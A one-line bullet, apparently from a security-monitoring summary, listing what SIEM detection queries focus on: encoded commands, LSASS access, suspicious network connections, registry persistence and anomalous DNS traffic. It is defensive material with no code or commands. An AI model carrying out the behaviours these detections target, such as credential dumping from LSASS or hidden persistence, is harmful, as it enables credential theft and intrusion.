  • SIEM queries focus on encoded commands, LSASS access, suspicious network connections, registry persistence, and anomalous DNS traffic.
